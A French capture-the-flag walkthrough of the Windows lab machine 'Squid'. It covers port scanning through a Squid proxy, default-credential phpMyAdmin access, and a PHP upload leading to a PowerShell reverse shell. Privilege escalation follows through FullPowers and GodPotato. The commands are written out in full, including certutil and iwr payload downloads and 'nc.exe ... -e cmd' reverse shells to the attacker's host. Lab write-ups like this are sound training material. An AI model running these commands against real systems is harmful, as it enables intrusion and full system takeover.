Squid

squid proxy phpmyadmin nt authority\local service

• Nom machine : Squid

• Difficulté : Easy

• OS : Windows

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-27 04:59 EDT
Nmap scan report for 192.168.248.189
Host is up (0.034s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3128/tcp  open  http-proxy    Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved
49666/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

SMB (139/445)

┌──(kali㉿kali)-[~]
└─$ smbclient -L //192.168.248.189                   
Password for [WORKGROUP\kali]:
session setup failed: NT_STATUS_ACCESS_DENIED

Aucun accès

HTTP-Proxy (3128) : Squid http proxy 4.14

3128 - Pentesting Squid - HackTricksHackTricks

Configurer le proxy

FoxyProxy

Enumérer les ports

Attention : nmap (avec proxychains) ne fonctionne pas ici, il faut utiliser spose.py.

GitHub - aancw/spose: Squid Pivoting Open Port ScannerGitHub

┌──(kali㉿kali)-[~]
└─$ git clone https://github.com/aancw/spose.git     
Cloning into 'spose'...
remote: Enumerating objects: 11, done.
remote: Total 11 (delta 0), reused 0 (delta 0), pack-reused 11
Receiving objects: 100% (11/11), done.

┌──(kali㉿kali)-[~]
└─$ cd spose

┌──(kali㉿kali)-[~/spose]
└─$ python spose.py --proxy http://192.168.248.189:3128 --target 192.168.248.189
Using proxy address http://192.168.248.189:3128
192.168.248.189 3306 seems OPEN 
192.168.248.189 8080 seems OPEN 

HTTP (8080) : Wampserver 3.2.3

Nous allons aller sur la pahe phpmyadmin

Une rapide recherche google nous indique que le nom d'utilisateur par défault est root.

Cela fonctionne !

Accès initial

phpMyAdmin

Nous avons créer une base de données : reverse. Ensuite nous avons formulé une requête SQL.

En visitant le lien http://192.168.248.189:8080/reverse.php, nous arrivons bien au fichier uploader.

Nous pouvant maintenant chercher à obtenir un reverse shell.

Online - Reverse Shell Generatorwww.revshells.com

Powershell base64 (encodé URL) fonctionne.

┌──(kali㉿kali)-[~/spose]
└─$ nc -lnvp 1234 
listening on [any] 1234 ...
connect to [192.168.45.158] from (UNKNOWN) [192.168.248.189] 50089
whoami
nt authority\local service

Le local.txt se trouve à C:\local.txt

Elévation des privilèges

nt authority\local service

Give Me Back My Privileges! Please?itm4n’s blog

GitHub - itm4n/FullPowers: Recover the default privilege set of a LOCAL/NETWORK SERVICE accountGitHub

Nous avons téléchargé le fichier .exe FullPowers.exe sur notre kali, lancer un server python puis l'avons ajouté sur notre machine cible. Nous avons également ajouté nc.exe.

Nous avons exécuté l'exploit et lancer un listener.

┌──(kali㉿kali)-[~]
└─$ python -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.248.189 - - [27/Jul/2024 06:31:23] "GET /Tools/FullPowers.exe HTTP/1.1" 200 -

PS C:\wamp\www> iwr -uri http://192.168.45.158:80/Tools/FullPowers.exe -Outfile FullPowers.exe
PS C:\wamp\www> ./FullPowers.exe -c "nc.exe 192.168.45.158 1235 -e cmd"

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1235 
listening on [any] 1235 ...
connect to [192.168.45.158] from (UNKNOWN) [192.168.248.189] 50093
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\local service

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

"SeImpersonatePrivilege" Nous pouvons l'exploiter

SeImpersonatePrivilege

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato - HackTricksHackTricks

C:\Windows\system32>cd /wamp/www
C:\wamp\www>certutil -f -urlcache http://192.168.45.158:80/Tools/GodPotato.exe

C:\wamp\www>god.exe -cmd "nc.exe 192.168.45.158 1236 -e cmd"
god.exe -cmd "nc.exe 192.168.45.158 1236 -e cmd"
[*] CombaseModule: 0x140733990830080
[*] DispatchTable: 0x140733993143488
[*] UseProtseqFunction: 0x140733992520752
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\d5fdf30f-3e3c-4561-8f94-c3ed68b3416c\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000bc02-0020-ffff-2bec-e3f4dd11ef72
[*] DCOM obj OXID: 0x1ba1d069c31f35a5
[*] DCOM obj OID: 0x638f6af33d820e90
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 876 Token:0x804  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1528

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1236 
listening on [any] 1236 ...
connect to [192.168.45.158] from (UNKNOWN) [192.168.248.189] 50107
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\wamp\www>whoami
whoami
nt authority\system

Nous sommes nt authority\system !